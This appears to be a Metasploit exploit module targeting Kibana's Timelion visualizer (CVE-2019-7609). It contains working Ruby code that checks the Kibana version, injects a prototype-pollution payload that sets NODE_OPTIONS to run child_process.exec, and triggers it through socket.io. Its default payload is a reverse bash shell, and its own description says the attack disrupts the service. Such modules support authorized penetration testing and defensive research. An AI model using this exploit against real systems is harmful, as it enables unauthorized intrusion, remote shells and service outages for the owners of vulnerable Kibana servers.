Kibana Timelion Prototype Pollution RCE

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking
  include Msf::Exploit::Remote::HttpClient
  prepend Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Kibana Timelion Prototype Pollution RCE',
        'Description' => %q{
          Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer.
          An attacker with access to the Timelion application could send a request that will attempt to execute
          javascript code. This leads to an arbitrary command execution with permissions of the
          Kibana process on the host system.

          Exploitation will require a service or system reboot to restore normal operation.

          The WFSDELAY parameter is crucial for this exploit. Setting it too high will cause MANY shells
          (50-100+), while setting it too low will cause no shells to be obtained. WFSDELAY of 10 for a
          docker image caused 6 shells.

          Tested against kibana 6.5.4.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Michał Bentkowski', # original PoC, analysis
          'Gaetan Ferry' # more analysis
        ],
        'References' => [
          [ 'URL', 'https://github.com/mpgn/CVE-2019-7609'],
          [ 'URL', 'https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/'],
          [ 'CVE', '2019-7609']
        ],
        'Platform' => ['unix'],
        'Privileged' => false,
        'Arch' => ARCH_CMD,
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DisclosureDate' => '2019-10-30',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_bash',
          'WfsDelay' => 10 # can take a minute to run
        },
        'Notes' => {
          # the webserver doesn't die, but certain requests no longer respond before a timeout
          # when things go poorly
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(5601),
        OptString.new('TARGETURI', [ true, 'The URI of the Kibana Application', '/'])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'app', 'kibana'),
      'method' => 'GET',
      'keep_cookies' => true
    )
    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200

    # this pulls a big JSON blob that we need as it has the version
    unless %r{<kbn-injected-metadata data="([^"]+)"></kbn-injected-metadata>} =~ res.body
      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
    end

    version_json = CGI.unescapeHTML(Regexp.last_match(1))

    begin
      json_body = JSON.parse(version_json)
    rescue JSON::ParserError
      return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version")
    end

    return Exploit::CheckCode::Safe("#{peer} - Unexpected response, unable to determine version") if json_body['version'].nil?

    @version = json_body['version']

    if Rex::Version.new(@version) < Rex::Version.new('5.6.15') ||
       (
         Rex::Version.new(@version) < Rex::Version.new('6.6.1') &&
         Rex::Version.new(@version) >= Rex::Version.new('6.0.0')
       )
      return CheckCode::Appears("Exploitable Version Detected: #{@version}")
    end

    CheckCode::Safe("Unexploitable Version Detected: #{@version}")
  end

  def get_xsrf
    vprint_status('Grabbing XSRF Token')
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'bundles', 'canvas.bundle.js'),
      'keep_cookies' => true
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200

    return Regexp.last_match(1) if /"kbn-xsrf":"([^"]+)"/ =~ res.body

    nil
  end

  def trigger_socket
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'socket.io/'), # trailing / is required
      'keep_cookies' => true,
      'headers' => {
        'kbn-xsrf' => @xsrf
      },
      'vars_get' => {
        'EIO' => 3,
        'transport' => 'polling'
      }
    )
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
  end

  def send_injection(reset: false)
    if reset
      pload = ".es(*).props(label.__proto__.env.AAAA='').props(label.__proto__.env.NODE_OPTIONS='')"
    else
      # we leave a marker for our payload to avoid having .to_json process it and make it unusable by the host OS
      pload = %|.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("PAYLOADHERE");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')|
    end
    body = {
      'sheet' => [pload],
      'time' => {
        'from' => 'now-15m',
        'to' => 'now',
        'mode' => 'quick',
        'interval' => 'auto',
        'timezone' => 'America/New_York'
      }
    }
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'api', 'timelion', 'run'),
      'method' => 'POST',
      'ctype' => 'application/json',
      'headers' => { 'kbn-version' => @version },
      'data' => body.to_json.sub('PAYLOADHERE', payload.encoded.gsub("'", "\\\\\\\\\\\\\\\\'")),
      'keep_cookies' => true
    )
    Rex.sleep(2) # let this take hold, if we go too fast we dont get the shell
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid response (response code: #{res.code})") unless res.code == 200
  end

  def exploit
    check if @version.nil?
    print_status('Polluting Prototype in Timelion')
    send_injection

    @xsrf = get_xsrf
    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to grab XSRF token") if @xsrf.nil?

    print_status('Trigginger payload execution via canvas socket')
    trigger_socket
    print_status('Waiting for shells')
    Rex.sleep(datastore['WFSDELAY'] / 10)
    unless @reset_done
      print_status('Unsetting to stop raining shells from a lacerated kibana')
      send_injection(reset: true)
      trigger_socket
    end
  end

  def on_new_session(_client)
    return if @reset_done

    print_status('Unsetting to stop raining shells from a lacerated kibana')
    send_injection(reset: true)
    trigger_socket
    @reset_done = true
  ensure
    super
  end

end